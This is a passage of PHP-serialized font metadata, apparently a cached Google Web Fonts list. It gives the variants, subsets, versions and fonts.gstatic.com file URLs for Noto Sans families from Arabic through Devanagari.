-myvu3CBFQLaig.ttf\";s:3:\"600\";s:124:\"http://fonts.gstatic.com/s/notosansarabic/v18/nwpxtLGrOAZMl5nJ_wfgRg3DrWFZWsnVBJ_sS6tlqHHFlhQ5l3sQWIHPqzCfFmuvu3CBFQLaig.ttf\";s:3:\"700\";s:124:\"http://fonts.gstatic.com/s/notosansarabic/v18/nwpxtLGrOAZMl5nJ_wfgRg3DrWFZWsnVBJ_sS6tlqHHFlhQ5l3sQWIHPqzCfL2uvu3CBFQLaig.ttf\";s:3:\"800\";s:124:\"http://fonts.gstatic.com/s/notosansarabic/v18/nwpxtLGrOAZMl5nJ_wfgRg3DrWFZWsnVBJ_sS6tlqHHFlhQ5l3sQWIHPqzCfSGuvu3CBFQLaig.ttf\";s:3:\"900\";s:124:\"http://fonts.gstatic.com/s/notosansarabic/v18/nwpxtLGrOAZMl5nJ_wfgRg3DrWFZWsnVBJ_sS6tlqHHFlhQ5l3sQWIHPqzCfYWuvu3CBFQLaig.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:835;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Sans Armenian\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:1:{i:0;s:8:\"armenian\";}s:7:\"version\";s:3:\"v32\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:128:\"http://fonts.gstatic.com/s/notosansarmenian/v32/ZgN0jOZKPa7CHqq0h37c7ReDUubm2SEdFXp7ig73qtTY5idb74R9UdM3y2nZLorxbq0iYy6zF3Eg.ttf\";s:3:\"200\";s:128:\"http://fonts.gstatic.com/s/notosansarmenian/v32/ZgN0jOZKPa7CHqq0h37c7ReDUubm2SEdFXp7ig73qtTY5idb74R9UdM3y2nZLopxb60iYy6zF3Eg.ttf\";s:3:\"300\";s:128:\"http://fonts.gstatic.com/s/notosansarmenian/v32/ZgN0jOZKPa7CHqq0h37c7ReDUubm2SEdFXp7ig73qtTY5idb74R9UdM3y2nZLoqvb60iYy6zF3Eg.ttf\";s:7:\"regular\";s:128:\"http://fonts.gstatic.com/s/notosansarmenian/v32/ZgN0jOZKPa7CHqq0h37c7ReDUubm2SEdFXp7ig73qtTY5idb74R9UdM3y2nZLorxb60iYy6zF3Eg.ttf\";s:3:\"500\";s:128:\"http://fonts.gstatic.com/s/notosansarmenian/v32/ZgN0jOZKPa7CHqq0h37c7ReDUubm2SEdFXp7ig73qtTY5idb74R9UdM3y2nZLorDb60iYy6zF3Eg.ttf\";s:3:\"600\";s:128:\"http://fonts.gstatic.com/s/notosansarmenian/v32/ZgN0jOZKPa7CHqq0h37c7ReDUubm2SEdFXp7ig73qtTY5idb74R9UdM3y2nZLoovaK0iYy6zF3Eg.ttf\";s:3:\"700\";s:128:\"http://fonts.gstatic.com/s/notosansarmenian/v32/ZgN0jOZKPa7CHqq0h37c7ReDUubm2SEdFXp7ig73qtTY5idb74R9UdM3y2nZLooWaK0iYy6zF3Eg.ttf\";s:3:\"800\";s:128:\"http://fonts.gstatic.com/s/notosansarmenian/v32/ZgN0jOZKPa7CHqq0h37c7ReDUubm2SEdFXp7ig73qtTY5idb74R9UdM3y2nZLopxaK0iYy6zF3Eg.ttf\";s:3:\"900\";s:128:\"http://fonts.gstatic.com/s/notosansarmenian/v32/ZgN0jOZKPa7CHqq0h37c7ReDUubm2SEdFXp7ig73qtTY5idb74R9UdM3y2nZLopYaK0iYy6zF3Eg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:836;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Sans Avestan\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:7:\"avestan\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/notosansavestan/v17/bWti7ejKfBziStx7lIzKOLQZKhIJkyu9SASLji8U.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:837;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Sans Balinese\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:8:\"balinese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:111:\"http://fonts.gstatic.com/s/notosansbalinese/v18/NaPwcYvSBuhTirw6IaFn6UrRDaqje-lpbbRtYf-Fwu2Ov7fdhE5Vd222PPY.ttf\";s:3:\"500\";s:111:\"http://fonts.gstatic.com/s/notosansbalinese/v18/NaPwcYvSBuhTirw6IaFn6UrRDaqje-lpbbRtYf-Fwu2Ov4XdhE5Vd222PPY.ttf\";s:3:\"600\";s:111:\"http://fonts.gstatic.com/s/notosansbalinese/v18/NaPwcYvSBuhTirw6IaFn6UrRDaqje-lpbbRtYf-Fwu2Ov2nahE5Vd222PPY.ttf\";s:3:\"700\";s:111:\"http://fonts.gstatic.com/s/notosansbalinese/v18/NaPwcYvSBuhTirw6IaFn6UrRDaqje-lpbbRtYf-Fwu2Ov1DahE5Vd222PPY.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:838;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Noto Sans Bamum\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:5:\"bamum\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:104:\"http://fonts.gstatic.com/s/notosansbamum/v18/uk-0EGK3o6EruUbnwovcbBTkkklK_Ya_PBHfNGTPEddO-_gLykxEkxA.ttf\";s:3:\"500\";s:104:\"http://fonts.gstatic.com/s/notosansbamum/v18/uk-0EGK3o6EruUbnwovcbBTkkklK_Ya_PBHfNGTPEeVO-_gLykxEkxA.ttf\";s:3:\"600\";s:104:\"http://fonts.gstatic.com/s/notosansbamum/v18/uk-0EGK3o6EruUbnwovcbBTkkklK_Ya_PBHfNGTPEQlJ-_gLykxEkxA.ttf\";s:3:\"700\";s:104:\"http://fonts.gstatic.com/s/notosansbamum/v18/uk-0EGK3o6EruUbnwovcbBTkkklK_Ya_PBHfNGTPETBJ-_gLykxEkxA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:839;O:8:\"stdClass\":8:{s:6:\"family\";s:19:\"Noto Sans Bassa Vah\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:9:\"bassa-vah\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:95:\"http://fonts.gstatic.com/s/notosansbassavah/v15/PN_sRee-r3f7LnqsD5sax12gjZn7mBpL_4c2VNUQptE.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:840;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Noto Sans Batak\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"batak\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/notosansbatak/v15/gok2H6TwAEdtF9N8-mdTCQvT-Zdgo4_PHuk74A.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:841;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Sans Bengali\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:7:\"bengali\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:126:\"http://fonts.gstatic.com/s/notosansbengali/v20/Cn-SJsCGWQxOjaGwMQ6fIiMywrNJIky6nvd8BjzVMvJx2mcSPVFpVEqE-6KmsolKudCk8izI0lc.ttf\";s:3:\"200\";s:126:\"http://fonts.gstatic.com/s/notosansbengali/v20/Cn-SJsCGWQxOjaGwMQ6fIiMywrNJIky6nvd8BjzVMvJx2mcSPVFpVEqE-6KmsglLudCk8izI0lc.ttf\";s:3:\"300\";s:126:\"http://fonts.gstatic.com/s/notosansbengali/v20/Cn-SJsCGWQxOjaGwMQ6fIiMywrNJIky6nvd8BjzVMvJx2mcSPVFpVEqE-6KmstdLudCk8izI0lc.ttf\";s:7:\"regular\";s:126:\"http://fonts.gstatic.com/s/notosansbengali/v20/Cn-SJsCGWQxOjaGwMQ6fIiMywrNJIky6nvd8BjzVMvJx2mcSPVFpVEqE-6KmsolLudCk8izI0lc.ttf\";s:3:\"500\";s:126:\"http://fonts.gstatic.com/s/notosansbengali/v20/Cn-SJsCGWQxOjaGwMQ6fIiMywrNJIky6nvd8BjzVMvJx2mcSPVFpVEqE-6KmsrtLudCk8izI0lc.ttf\";s:3:\"600\";s:126:\"http://fonts.gstatic.com/s/notosansbengali/v20/Cn-SJsCGWQxOjaGwMQ6fIiMywrNJIky6nvd8BjzVMvJx2mcSPVFpVEqE-6KmsldMudCk8izI0lc.ttf\";s:3:\"700\";s:126:\"http://fonts.gstatic.com/s/notosansbengali/v20/Cn-SJsCGWQxOjaGwMQ6fIiMywrNJIky6nvd8BjzVMvJx2mcSPVFpVEqE-6Kmsm5MudCk8izI0lc.ttf\";s:3:\"800\";s:126:\"http://fonts.gstatic.com/s/notosansbengali/v20/Cn-SJsCGWQxOjaGwMQ6fIiMywrNJIky6nvd8BjzVMvJx2mcSPVFpVEqE-6KmsglMudCk8izI0lc.ttf\";s:3:\"900\";s:126:\"http://fonts.gstatic.com/s/notosansbengali/v20/Cn-SJsCGWQxOjaGwMQ6fIiMywrNJIky6nvd8BjzVMvJx2mcSPVFpVEqE-6KmsiBMudCk8izI0lc.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:842;O:8:\"stdClass\":8:{s:6:\"family\";s:19:\"Noto Sans Bhaiksuki\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:9:\"bhaiksuki\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/notosansbhaiksuki/v15/UcC63EosKniBH4iELXATsSBWdvUHXxhj8rLUdU4wh9U.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:843;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Noto Sans Brahmi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:6:\"brahmi\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/notosansbrahmi/v15/vEFK2-VODB8RrNDvZSUmQQIIByV18tK1W77HtMo.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:844;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Sans Buginese\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:8:\"buginese\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:94:\"http://fonts.gstatic.com/s/notosansbuginese/v15/esDM30ldNv-KYGGJpKGk18phe_7Da6_gtfuEXLmNtw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:845;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Noto Sans Buhid\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"buhid\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/notosansbuhid/v17/Dxxy8jiXMW75w3OmoDXVWJD7YwzAe6tgnaFoGA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:846;O:8:\"stdClass\":8:{s:6:\"family\";s:29:\"Noto Sans Canadian Aboriginal\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:1:{i:0;s:19:\"canadian-aboriginal\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-06-01\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:136:\"http://fonts.gstatic.com/s/notosanscanadianaboriginal/v19/4C_TLjTuEqPj-8J01CwaGkiZ9os0iGVkezM1mUT-j_Lmlzda6uH_nnX1bzigWLj_yAsg0q0uhQ.ttf\";s:3:\"200\";s:136:\"http://fonts.gstatic.com/s/notosanscanadianaboriginal/v19/4C_TLjTuEqPj-8J01CwaGkiZ9os0iGVkezM1mUT-j_Lmlzda6uH_nnX1bzig2Ln_yAsg0q0uhQ.ttf\";s:3:\"300\";s:136:\"http://fonts.gstatic.com/s/notosanscanadianaboriginal/v19/4C_TLjTuEqPj-8J01CwaGkiZ9os0iGVkezM1mUT-j_Lmlzda6uH_nnX1bzigBrn_yAsg0q0uhQ.ttf\";s:7:\"regular\";s:136:\"http://fonts.gstatic.com/s/notosanscanadianaboriginal/v19/4C_TLjTuEqPj-8J01CwaGkiZ9os0iGVkezM1mUT-j_Lmlzda6uH_nnX1bzigWLn_yAsg0q0uhQ.ttf\";s:3:\"500\";s:136:\"http://fonts.gstatic.com/s/notosanscanadianaboriginal/v19/4C_TLjTuEqPj-8J01CwaGkiZ9os0iGVkezM1mUT-j_Lmlzda6uH_nnX1bzigarn_yAsg0q0uhQ.ttf\";s:3:\"600\";s:136:\"http://fonts.gstatic.com/s/notosanscanadianaboriginal/v19/4C_TLjTuEqPj-8J01CwaGkiZ9os0iGVkezM1mUT-j_Lmlzda6uH_nnX1bzighr7_yAsg0q0uhQ.ttf\";s:3:\"700\";s:136:\"http://fonts.gstatic.com/s/notosanscanadianaboriginal/v19/4C_TLjTuEqPj-8J01CwaGkiZ9os0iGVkezM1mUT-j_Lmlzda6uH_nnX1bzigv77_yAsg0q0uhQ.ttf\";s:3:\"800\";s:136:\"http://fonts.gstatic.com/s/notosanscanadianaboriginal/v19/4C_TLjTuEqPj-8J01CwaGkiZ9os0iGVkezM1mUT-j_Lmlzda6uH_nnX1bzig2L7_yAsg0q0uhQ.ttf\";s:3:\"900\";s:136:\"http://fonts.gstatic.com/s/notosanscanadianaboriginal/v19/4C_TLjTuEqPj-8J01CwaGkiZ9os0iGVkezM1mUT-j_Lmlzda6uH_nnX1bzig8b7_yAsg0q0uhQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:847;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Noto Sans Carian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:6:\"carian\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/notosanscarian/v15/LDIpaoiONgYwA9Yc6f0gUILeMIOgs7ob9yGLmfI.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:848;O:8:\"stdClass\":8:{s:6:\"family\";s:28:\"Noto Sans Caucasian Albanian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:18:\"caucasian-albanian\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:116:\"http://fonts.gstatic.com/s/notosanscaucasianalbanian/v16/nKKA-HM_FYFRJvXzVXaANsU0VzsAc46QGOkWytlTs-TXrYDmoVmRSZo.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:849;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Noto Sans Chakma\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:6:\"chakma\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/notosanschakma/v15/Y4GQYbJ8VTEp4t3MKJSMjg5OIzhi4JjTQhYBeYo.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:850;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Noto Sans Cham\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:1:{i:0;s:4:\"cham\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-06-01\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:102:\"http://fonts.gstatic.com/s/notosanscham/v19/pe06MIySN5pO62Z5YkFyQb_bbuRhe6D4yip43qfcER0cv7GykboaLg.ttf\";s:3:\"200\";s:102:\"http://fonts.gstatic.com/s/notosanscham/v19/pe06MIySN5pO62Z5YkFyQb_bbuRhe6D4yip43qfckRwcv7GykboaLg.ttf\";s:3:\"300\";s:102:\"http://fonts.gstatic.com/s/notosanscham/v19/pe06MIySN5pO62Z5YkFyQb_bbuRhe6D4yip43qfcTxwcv7GykboaLg.ttf\";s:7:\"regular\";s:102:\"http://fonts.gstatic.com/s/notosanscham/v19/pe06MIySN5pO62Z5YkFyQb_bbuRhe6D4yip43qfcERwcv7GykboaLg.ttf\";s:3:\"500\";s:102:\"http://fonts.gstatic.com/s/notosanscham/v19/pe06MIySN5pO62Z5YkFyQb_bbuRhe6D4yip43qfcIxwcv7GykboaLg.ttf\";s:3:\"600\";s:102:\"http://fonts.gstatic.com/s/notosanscham/v19/pe06MIySN5pO62Z5YkFyQb_bbuRhe6D4yip43qfczxscv7GykboaLg.ttf\";s:3:\"700\";s:102:\"http://fonts.gstatic.com/s/notosanscham/v19/pe06MIySN5pO62Z5YkFyQb_bbuRhe6D4yip43qfc9hscv7GykboaLg.ttf\";s:3:\"800\";s:102:\"http://fonts.gstatic.com/s/notosanscham/v19/pe06MIySN5pO62Z5YkFyQb_bbuRhe6D4yip43qfckRscv7GykboaLg.ttf\";s:3:\"900\";s:102:\"http://fonts.gstatic.com/s/notosanscham/v19/pe06MIySN5pO62Z5YkFyQb_bbuRhe6D4yip43qfcuBscv7GykboaLg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:851;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Sans Cherokee\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:1:{i:0;s:8:\"cherokee\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:111:\"http://fonts.gstatic.com/s/notosanscherokee/v17/KFOPCm6Yu8uF-29fiz9vQF9YWK6Z8O10cHNA0cSkZCHYWi5ODkm5rAffjl0.ttf\";s:3:\"200\";s:111:\"http://fonts.gstatic.com/s/notosanscherokee/v17/KFOPCm6Yu8uF-29fiz9vQF9YWK6Z8O10cHNA0cSkZCHYWq5PDkm5rAffjl0.ttf\";s:3:\"300\";s:111:\"http://fonts.gstatic.com/s/notosanscherokee/v17/KFOPCm6Yu8uF-29fiz9vQF9YWK6Z8O10cHNA0cSkZCHYWnBPDkm5rAffjl0.ttf\";s:7:\"regular\";s:111:\"http://fonts.gstatic.com/s/notosanscherokee/v17/KFOPCm6Yu8uF-29fiz9vQF9YWK6Z8O10cHNA0cSkZCHYWi5PDkm5rAffjl0.ttf\";s:3:\"500\";s:111:\"http://fonts.gstatic.com/s/notosanscherokee/v17/KFOPCm6Yu8uF-29fiz9vQF9YWK6Z8O10cHNA0cSkZCHYWhxPDkm5rAffjl0.ttf\";s:3:\"600\";s:111:\"http://fonts.gstatic.com/s/notosanscherokee/v17/KFOPCm6Yu8uF-29fiz9vQF9YWK6Z8O10cHNA0cSkZCHYWvBIDkm5rAffjl0.ttf\";s:3:\"700\";s:111:\"http://fonts.gstatic.com/s/notosanscherokee/v17/KFOPCm6Yu8uF-29fiz9vQF9YWK6Z8O10cHNA0cSkZCHYWslIDkm5rAffjl0.ttf\";s:3:\"800\";s:111:\"http://fonts.gstatic.com/s/notosanscherokee/v17/KFOPCm6Yu8uF-29fiz9vQF9YWK6Z8O10cHNA0cSkZCHYWq5IDkm5rAffjl0.ttf\";s:3:\"900\";s:111:\"http://fonts.gstatic.com/s/notosanscherokee/v17/KFOPCm6Yu8uF-29fiz9vQF9YWK6Z8O10cHNA0cSkZCHYWodIDkm5rAffjl0.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:852;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Noto Sans Coptic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:6:\"coptic\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/notosanscoptic/v15/iJWfBWmUZi_OHPqn4wq6kgqumOEd78u_VG0xR4Y.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:853;O:8:\"stdClass\":8:{s:6:\"family\";s:19:\"Noto Sans Cuneiform\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:9:\"cuneiform\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/notosanscuneiform/v15/bMrrmTWK7YY-MF22aHGGd7H8PhJtvBDWgb9JlRQueeQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:854;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Sans Cypriot\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:7:\"cypriot\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/notosanscypriot/v15/8AtzGta9PYqQDjyp79a6f8Cj-3a3cxIsK5MPpahF.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:855;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Sans Deseret\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:7:\"deseret\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/notosansdeseret/v15/MwQsbgPp1eKH6QsAVuFb9AZM6MMr2Vq9ZnJSZtQG.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:856;O:8:\"stdClass\":8:{s:6:\"family\";s:20:\"Noto Sans Devanagari\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:133:\"http://fonts.gstatic.com/s/notosansdevanagari/v19/TuGoUUFzXI5FBtUq5a8bjKYTZjtRU6Sgv3NaV_SNmI0b8QQCQmHn6B2OHjbL_08AlXQky-AzoFoW4Ow.ttf\";s:3:\"200\";s:133:\"http://fonts.gstatic.com/s/notosansdevanagari/v19/TuGoUUFzXI5FBtUq5a8bjKYTZjtRU6Sgv3NaV_SNmI0b8QQCQmHn6B2OHjbL_08AlfQly-AzoFoW4Ow.ttf\";s:3:\"300\";s:133:\"http://fonts.gstatic.com/s/notosansdevanagari/v19/TuGoUUFzXI5FBtUq5a8bjKYTZjtRU6Sgv3NaV_SNmI0b8QQCQmHn6B2OHjbL_08AlSoly-AzoFoW4Ow.ttf\";s:7:\"regular\";s:133:\"http://fonts.gstatic.com/s/notosansdevanagari/v19/TuGoUUFzXI5FBtUq5a8bjKYTZjtRU6Sgv3NaV_SNmI0b8QQCQmHn6B2OHjbL_08AlXQly-AzoFoW4Ow.ttf\";s:3:\"500\";s:133:\"http://fonts.gstatic.com/s/notosansdevanagari/v19/TuGoUUFzXI5FBtUq5a8bjKYTZjtRU6Sgv3NaV_SNmI0b8QQCQmHn6B2OHjbL_08AlUYly-AzoFoW4Ow.ttf\";s:3:\"600\";s:133:\"http://fonts.gstatic.com/s/notosansdevanagari/v19/TuGoUUFzXI5FBtUq5a8bjKYTZjtRU6Sgv3NaV_SNmI0b8QQCQmHn6B2OHjbL_08Alaoiy-AzoFoW4Ow.ttf\";s:3:\"700\";s:133:\"http://fonts.gstatic.com/s/notosansdevanagari/v19/TuGoUUFzXI5FBtUq5a8bjKYTZjtRU6Sgv3NaV_SNmI0b8QQCQmHn6B2OHjbL_08AlZMiy-AzoFoW4Ow.ttf\";s:3:\"800\";s:133:\"http://fonts.gstatic.com/s/notosansdevanagari/v19/TuGoUUFzXI5FBtUq5a8bjKYTZjtRU6Sgv3NaV_SNmI0b8QQCQmHn6B2OHjbL_08AlfQiy-AzoFoW4Ow.ttf\";s:3:\"900\";s:133:\"http://fonts.gstatic.com/s/notosansdevanagari/v19/TuGoUUFzXI5FBtUq5a8bjKYTZjtRU6Sgv3NaV_SNmI0b8QQCQmHn6B2OHjbL_08Ald0iy-AzoFoW4Ow.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:857;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Sans 